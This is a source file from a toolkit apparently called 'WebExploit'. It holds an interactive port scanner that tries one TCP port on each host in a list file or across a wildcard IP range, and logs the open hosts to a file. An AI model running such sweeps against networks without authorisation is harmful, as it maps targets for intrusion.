-------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/cms.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/dirboster.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/dirboster.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/fpc.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/fpc.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/ipl.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ipl.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/mojiana.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/mojiana.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/ping.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ping.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/rarc.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/rarc.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/ril.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ril.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/ssc.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ssc.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/sse.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/sse.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/wpf.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/wpf.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/zipc.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/zipc.cpython-310.pyc -------------------------------------------------------------------------------- /cores/aps.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | #import re 26 | import time as t 27 | try: 28 | from colorama import Fore as f 29 | from random import choice 30 | import socket 31 | except: 32 | print ('\n\033[3m please run \' pip install -r reqirements.txt \' ') 33 | sys.exit() 34 | import sys, os 35 | 36 | black = "\033[0;30m" 37 | red = "\033[0;31m" 38 | green = "\033[0;32m" 39 | brown = "\033[0;33m" 40 | blue = "\033[0;34m" 41 | purple = "\033[0;35m" 42 | cyan = "\033[0;36m" 43 | l_gray = "\033[0;37m" 44 | dark_gray = "\033[1;30m" 45 | l_red = "\033[1;31m" 46 | l_green = "\033[1;32m" 47 | yellow = "\033[1;33m" 48 | l_blue = "\033[1;34m" 49 | l_purple = "\033[1;35m" 50 | l_cyan = "\033[1;36m" 51 | l_white = "\033[1;37m" 52 | faint = "\033[2m" 53 | italic = "\033[3m" 54 | underline = "\033[4m" 55 | blink = "\033[5m" 56 | nefative = "\033[7m" 57 | cross = "\033[9m" 58 | ended = "\033[0m" 59 | bold = "\033[1m" 60 | nbold = "\033[0m" 61 | white = f.WHITE 62 | bnr = [''' 63 | ░█▀▀▄░▒█▀▀█░▒█▀▀▀█ 64 | ▒█▄▄█░▒█▄▄█░░▀▀▀▄▄ 65 | ▒█░▒█░▒█░░░░▒█▄▄▄█''', ''' 66 | 67 | ▄▄▄ ██▓███ ██████ 68 | ▒████▄ ▓██░ ██ ▒██ ▒ 69 | ▒██ ▀█▄ ▓██░ ██▓▒░ ▓██▄ 70 | ░██▄▄▄▄██▒██▄█▓▒ ▒ ▒ ██▒ 71 | ▓█ ▓██▒██▒ ░ ░▒██████▒▒ 72 | ▒▒ ▓▒█▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░ 73 | ░ ▒▒ ░▒ ░ ░ ░▒ ░ 74 | ░ ▒ ░░ ░ ░ ░ 75 | ░ ░ '''] 76 | 77 | def r_bnr(bnr): 78 | return choice(bnr) 79 | print(f'{bold}') 80 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 81 | t.sleep(2) 82 | print(f' {italic}From{ended} : ', end='') 83 | print(f'{red}{bold}', end='', flush=True) 84 | #create flush text [simple] 85 | print(f'{bold}W', end='', flush=True) 86 | t.sleep(0.5) 87 | print('e', end='', flush=True) 88 | t.sleep(0.7) 89 | print('b', end='', flush=True) 90 | t.sleep(0.4) 91 | print('E', end='', flush=True) 92 | t.sleep(0.1) 93 | print('x', end='', flush=True) 94 | t.sleep(0.2) 95 | print('p', end='', flush=True) 96 | t.sleep(0.3) 97 | print('l', end='', flush=True) 98 | t.sleep(0.4) 99 | print('o', end='', flush=True) 100 | t.sleep(0.5) 101 | print('i', end='', flush=True) 102 | t.sleep(1.5) 103 | print(f't{ended}', flush=True) 104 | nbold = "\033[0m" # tahe koskholi ! 105 | t.sleep(1) 106 | 107 | 108 | 109 | print (f'\n {bold}{f.GREEN}[{f.WHITE}APS{f.GREEN}]{f.WHITE}{f.RED} A.P.S{f.WHITE}{nbold} {bold}A{nbold}dvanced {bold}P{nbold}ort {bold}S{nbold}canner tool !\n\n\n') 110 | t.sleep(3) 111 | 112 | print(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}CONNECTOR{nbold}{f.WHITE}] {bold} Loading {nbold} {bold}{l_blue}CONNECTOR . . .{nbold}\n') 113 | import socket 114 | 115 | def single(): 116 | import time as t 117 | while True: 118 | try: 119 | ip_addr = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-ADDRESS{nbold}{f.WHITE} enter \'IP-ADDRESS-{bold}FILE{nbold}\' | (ex: /home/kali/Desktop/hosts.txt) [hosts.txt]:#{f.GREEN}{bold} ') 120 | 121 | if ip_addr: 122 | try: 123 | hosts = open(ip_addr, 'r').read().split() 124 | print (f'\n {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}LOADER{nbold}{f.WHITE}] LOADED {bold} %s {nbold} HOSTS {bold}Successfully...{nbold}\n' % len(hosts)) 125 | t.sleep(1) 126 | print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}HOSTS-FILE{f.WHITE} >>> {bold}{ip_addr}{nbold}\n') 127 | break 128 | 129 | except Exception as open_error: 130 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} BECAUSE {red}{bold}{open_error}{f.WHITE} .\n') 131 | continue 132 | except KeyboardInterrupt: 133 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 134 | break 135 | break 136 | t.sleep(2) 137 | sys.exit() 138 | sys.exit(0) 139 | 140 | t.sleep(2) 141 | 142 | while True: 143 | try: 144 | port = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT{nbold}{f.WHITE} ENTER \'PORT-NUM\' FOR START A.P.S PORT SCAN | ex:[22, 80, 443, 21]:#{f.GREEN}{bold} ') 145 | 146 | if port: 147 | if int(port) <= 65535: 148 | # defining known ports 149 | if port == '22': 150 | typ = 'ssh' 151 | elif port == '21': 152 | typ = 'ftp' 153 | elif port == '23': 154 | typ = 'telnet' 155 | elif port == '25': 156 | typ = 'smtp' 157 | elif port == '53': 158 | typ = 'dns' 159 | elif port == '80': 160 | typ = 'http' 161 | elif port == '110': 162 | typ = 'pop3' 163 | elif port == '143': 164 | typ = 'imap-4' 165 | elif port == '443': 166 | typ = 'https' 167 | elif port == '67': 168 | typ = 'dhcp' 169 | elif port == '3306': 170 | typ = 'mysql' 171 | elif port == '69': 172 | typ = 'tftp' 173 | elif port == '123': 174 | typ = 'ntp' 175 | elif port == '161': #162 176 | typ = 'snmp' 177 | elif port == '134': # 134 to 140 178 | typ = 'NetBios' 179 | elif port == '445': 180 | typ = 'Microsoft-DS' 181 | elif port == '5432': 182 | typ = 'postgresql' 183 | elif port == '9100': 184 | typ = 'jetdirect' 185 | elif port == '2000': 186 | typ = 'cisco-sccp' 187 | elif port == '5900': 188 | typ = 'vnc' 189 | elif port == '1027': 190 | typ = 'iis' 191 | else: 192 | typ = "unknown" 193 | # end known ports 194 | try: 195 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT[S]{nbold}{f.WHITE}] {f.CYAN}SINGLE PORT{f.WHITE} >>>{bold} {port}[{typ}]{nbold} \n') 196 | t.sleep(2) 197 | break 198 | except Exception: 199 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT[S]{nbold}{f.WHITE}] {f.CYAN}SINGLE PORT{f.WHITE} >>>{bold} {port}{nbold} \n') 200 | t.sleep(2) 201 | break 202 | 203 | #print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} EXITTING . . .') 204 | if int(port) > 65535: 205 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}PORT[S]{nbold}{f.WHITE}] PORT ~>{f.WHITE} [{red}{bold}{ip_addr}{nbold}{l_white}].\n') 206 | t.sleep(3) 207 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} !\n') 208 | t.sleep(2) 209 | continue 210 | 211 | else: 212 | pass 213 | else: 214 | pass 215 | 216 | except KeyboardInterrupt: 217 | 218 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 219 | t.sleep(2) 220 | sys.exit(0) 221 | try: 222 | timeot = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}DELAY{nbold}{f.WHITE} enter \'TIMEOT\' | (ex: 10, 5, 2, 100) [DEFAULT ~> 10]:#{f.CYAN}{bold} ') 223 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}{timeot}{nbold}\n') 224 | 225 | except Exception: 226 | timeot = 1 227 | # print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}{timeot}{nbold}\n') 228 | print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET-DEFAULT{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}1{nbold}\n') 229 | # 2 try ??¿ 230 | try: 231 | socket.setdefaulttimeout(int(timeot)) 232 | except: 233 | timeot = 1 234 | socket.setdefaulttimeout(timeot) 235 | 236 | path = os.getcwd() 237 | 238 | 239 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}SAVING{bold}{f.GREEN} Results{nbold}{f.WHITE}] IN {f.WHITE}~> [{f.GREEN}{bold}{path}+hosts-aps-{port}-opens.txt{nbold}{f.WHITE}] file !\n') 240 | 241 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}LAUNCH{bold}{f.GREEN} SCANNING . . .{nbold}!\n') 242 | 243 | for single_host in hosts: 244 | try: 245 | socket_connector = socket.create_connection((single_host, int(port))) 246 | 247 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{f.GREEN}OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.WHITE}] HOST {f.WHITE}~> [{f.GREEN}{bold}{single_host}{nbold}{f.WHITE}] \n') 248 | with open(path+'hosts-aps-'+port+'-opens.txt', 'a+') as true_host: 249 | true_host.write(single_host+'\n') 250 | 251 | except Exception as host_error: 252 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{red}NOT-OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.BLUE}] HOST {f.WHITE}~> [{f.RED}{bold}{single_host}{nbold}{f.WHITE}] \n') 253 | 254 | def multi(): 255 | import time as t 256 | 257 | while True: 258 | try: 259 | port = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT{nbold}{f.WHITE} enter \'PORT\' FOR START A.P.S PORT SCAN | ex:[21, 22, 80]:#{f.GREEN}{bold} ') 260 | 261 | if port: 262 | if int(port) <= 65535: 263 | # defining known ports 264 | if port == '22': 265 | typ = 'ssh' 266 | elif port == '21': 267 | typ = 'ftp' 268 | elif port == '23': 269 | typ = 'telnet' 270 | elif port == '25': 271 | typ = 'smtp' 272 | elif port == '53': 273 | typ = 'dns' 274 | elif port == '80': 275 | typ = 'http' 276 | elif port == '110': 277 | typ = 'pop3' 278 | elif port == '143': 279 | typ = 'imap-4' 280 | elif port == '443': 281 | typ = 'https' 282 | elif port == '67': 283 | typ = 'dhcp' 284 | elif port == '3306': 285 | typ = 'mysql' 286 | elif port == '69': 287 | typ = 'tftp' 288 | elif port == '123': 289 | typ = 'ntp' 290 | elif port == '161': #162 291 | typ = 'snmp' 292 | elif port == '134': # 134 to 140 293 | typ = 'NetBios' 294 | elif port == '445': 295 | typ = 'Microsoft-DS' 296 | elif port == '5432': 297 | typ = 'postgresql' 298 | elif port == '9100': 299 | typ = 'jetdirect' 300 | elif port == '2000': 301 | typ = 'cisco-sccp' 302 | elif port == '5900': 303 | typ = 'vnc' 304 | elif port == '1027': 305 | typ = 'iis' 306 | else: 307 | typ = "unknown" 308 | # end known ports 309 | try: 310 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}PORT[S]{nbold}{f.WHITE}] {f.CYAN}SINGLE PORT{f.WHITE} >>>{bold} {port}[{typ}]{nbold} \n') 311 | t.sleep(2) 312 | break 313 | except KeyboardInterrupt: 314 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 315 | t.sleep(2) 316 | break 317 | sys.exit() 318 | 319 | #print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} EXITTING . . .') 320 | if int(port) > 65535: 321 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}PORT[S]{nbold}{f.WHITE}] PORT ~>{f.WHITE} [{red}{bold}{ip_addr}{nbold}{l_white}].\n') 322 | t.sleep(3) 323 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}INVALID PORT{nbold} !\n') 324 | t.sleep(2) 325 | continue 326 | 327 | else: 328 | pass 329 | else: 330 | pass 331 | 332 | except KeyboardInterrupt: 333 | 334 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 335 | t.sleep(2) 336 | sys.exit(0) 337 | try: 338 | print (f'\n {f.WHITE}[{f.RED}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}TIMEOUT{white} if you set time out more than 10 sec = {red}{bold}ASP{nbold}{white} sleep 10 sec after a scan !\n') 339 | t.sleep(1) 340 | timeot = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}DELAY{nbold}{f.WHITE} enter \'TIMEOT\' | (ex: 10, 5, 2, 100) [DEFAULT ~> 1]:#{f.CYAN}{bold} ') 341 | if timeot: 342 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}{timeot}{nbold}\n') 343 | else: 344 | timeot = 1 345 | 346 | print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET-DEFAULT{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}1{nbold}\n') 347 | 348 | except KeyboardInterrupt: 349 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 350 | sys.exit(0) 351 | # timeot = 1 352 | # 353 | # print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}SET-DEFAULT{nbold}{f.WHITE}] {f.CYAN}TIMEOUT{f.WHITE} >>> {bold}1{nbold}\n') 354 | # 2 try ??¿ 355 | try: 356 | socket.setdefaulttimeout(int(timeot)) 357 | except: 358 | timeot = 1 359 | socket.setdefaulttimeout(timeot) 360 | t.sleep(1) 361 | 362 | 363 | 364 | 365 | 366 | while True: 367 | try: 368 | ip = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-ADDRESS{nbold}{f.WHITE} enter \'IP-{bold}ADDRESS{nbold}\' | (ex: 5.13.*.*) [should ip have \'*\' ! [ the \'*\' range !]]:#{f.GREEN}{bold} ') 369 | t.sleep(1) 370 | ect = ip.count('*') 371 | if ip: 372 | if ect == 1: 373 | print (f'\n {f.WHITE}[{bold}{f.YELLOW}IP{nbold}{f.WHITE}] SET-IP ~>{f.WHITE} [{red}{bold}{ip}{nbold}{f.WHITE}]\n') 374 | break 375 | if ip == None: 376 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} IN {red}{bold}IP:{ip}{f.WHITE} max \'*\' == 1 but you entered {str(ect)} {nbold} ! .\n') 377 | continue 378 | if ect > 1: 379 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} IN {red}{bold}IP{f.WHITE} max \'*\' == 1 but you entered {str(ect)} {nbold} ! .\n') 380 | continue 381 | else: 382 | pass 383 | else: 384 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} IN {red}{bold}IP{f.WHITE} plz enter a IPv4 {nbold} ! .\n') 385 | continue 386 | 387 | #print (f'\n {f.WHITE}[{bold}{f.YELLOW}IP{nbold}{f.WHITE}] SET-IP ~>{f.WHITE} [{red}{bold}{ip}{nbold}{f.WHITE}]\n') 388 | 389 | #except Exception as i_error: 390 | # print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} BECAUSE {red}{bold}{i_error}{f.WHITE} {nbold} ! .\n') 391 | # continue 392 | 393 | except KeyboardInterrupt: 394 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} | EXITTING . . .') 395 | sys.exit() 396 | break 397 | t.sleep(2) 398 | sys.exit(0) 399 | 400 | t.sleep(1) 401 | while True: 402 | try: 403 | ip_range = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-RANGE[1]{nbold}{f.WHITE} enter \'IP-RANGE-{bold}0-255{nbold}\' | (ex: 255) [only type 255 !]:#{f.GREEN}{bold} ') 404 | if int(ip_range) <= 255: 405 | print (f'\n {white}[{bold}{f.YELLOW}IP-RANGE{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold}{ip_range}{nbold}{l_white}].\n') 406 | break 407 | if int(ip_range) > 255 or None: 408 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}MORE THAN{f.WHITE}{nbold}[{bold}{f.YELLOW}RANGE{nbold}{f.WHITE}] Using {bold}DEFAULT{nbold}-RANGE.\n') 409 | t.sleep(1) 410 | print (f'\n {white}[{bold}{f.YELLOW}IP-RANGE-DEFAULT{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold}{ip_range}{nbold}{l_white}].\n') 411 | t.sleep(1) 412 | ip_range = 255 413 | t.sleep(1) 414 | print (f'\n {white}[{bold}{f.YELLOW}ip-RANGE{nbold}{f.WHITE}] RANGE[DEFAULT] ~>{f.WHITE} [{red}{bold}{ip_range}{nbold}{white}].\n') 415 | break 416 | except KeyboardInterrupt: 417 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 418 | break 419 | t.sleep(2) 420 | sys.exit() 421 | 422 | # print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}IP-RANGE{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold} {ip_range} {nbold}{white}].\n') 423 | # t.sleep(2) 424 | # print (f'\n {white}[{bold}{f.YELLOW}IP-RANGE-DEFAULT{nbold}{f.WHITE}] RANGE ~>{f.WHITE} [{red}{bold}255{nbold}{white}].\n') 425 | # ip_range = 255 426 | 427 | ip_range = int(ip_range) 428 | ip_range += 1 429 | if ect == 1: 430 | 431 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}SET-1-\'*\'{white} Found a \'*\' {nbold}{f.WHITE} in [{ip}] !\n') 432 | t.sleep(1) 433 | 434 | path = os.getcwd() 435 | 436 | 437 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}SAVING{bold}{f.GREEN} Results{nbold}{f.WHITE}] IN {f.WHITE}~> [{f.GREEN}{bold}{path}aps-multi-{port}-opens.txt{nbold}{f.WHITE}] file !\n') 438 | 439 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}LAUNCH{bold}{f.GREEN} SCANNING . . .{nbold}!\n') 440 | t.sleep(1) 441 | for i in range(0, int(ip_range)): 442 | ipq = ip.replace('*', str(i)) 443 | try: 444 | 445 | socket_connector = socket.create_connection((str(ipq), int(port))) 446 | 447 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{f.GREEN}OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.WHITE}] HOST {f.WHITE}~> [{f.GREEN}{bold}{ipq}{nbold}{f.WHITE}] \n') 448 | 449 | with open(path+'hosts-multi-'+port+'-opens.txt', 'a+') as true_host: 450 | true_host.write(ipq+'\n') 451 | 452 | except Exception as host_error: 453 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{red}NOT-OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.BLUE}] HOST {f.WHITE}~> [{f.RED}{bold}{ipq}{nbold}{f.WHITE}] \n') 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | while True: 463 | try: 464 | select = input(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}MODE{nbold}{f.WHITE}| (2 MULTI-WITH-FILE, 1 SINGLE]:#{f.GREEN}{bold} ') 465 | 466 | except Exception as s_e: 467 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} BECAUSE: {bold}[{s_e}] {nbold} EXITTING . . .\n') 468 | t.sleep(2) 469 | break 470 | sys.exit() 471 | 472 | 473 | if select == '1': 474 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}MODE[1]{nbold}{f.WHITE}') 475 | t.sleep(2) 476 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}Loading{white} MODE 2 [{bold}MULTI-HOST-FILE{nbold}] !\n\n\n') 477 | multi() 478 | if select == '2': 479 | print(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}MODE[2]{nbold}{f.WHITE}') 480 | t.sleep(2) 481 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}Loading{white} MODE 1 [{bold}SINGLE{nbold}] !\n\n\n') 482 | single() 483 | if select == None: 484 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} MODE {bold}[NOT SELECTED] {red}{nbold} EXITTING . . .\n') 485 | sys.exit() 486 | 487 | 488 | 489 | # if ect == 2: 490 | # 491 | # print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}{bold}SET-2-\'*\'{white} Found TWO-2 \'*\' {nbold}{f.WHITE} in [{ip}] !\n') 492 | # t.sleep(1) 493 | # 494 | # path = os.getcwd() 495 | # 496 | # print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}SAVING{bold}{f.GREEN} Results{nbold}{f.WHITE}] IN {f.WHITE}~> [{f.GREEN}{bold}{path}aps-multi-{port}-opens.txt{nbold}{f.WHITE}] file !\n') 497 | # t.sleep(2) 498 | # print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}A.P.S/{f.CYAN}LAUNCH{bold}{f.GREEN} SCANNING . . .{nbold}!\n') 499 | # t.sleep(1) 500 | # 501 | # 502 | # for i in range(0, int(ip_range)): 503 | # #ipq = ip.replace('*', str(i)) 504 | # for t in range(int(ip_range)): 505 | # ipqq = ip.replace('*', str(t)) 506 | # try: 507 | # socket_connector = socket.create_connection((str(ipqq), int(port))) 508 | # print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{f.GREEN}OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.WHITE}] HOST {f.WHITE}~> [{f.GREEN}{bold}{ipqq}{nbold}{f.WHITE}] \n') 509 | # with open(path+'hosts-multi-'+port+'-opens.txt', 'a+') as true_host: 510 | # true_host.write(ipqq+'\n') 511 | # except Exception as host_error: 512 | # print (f' 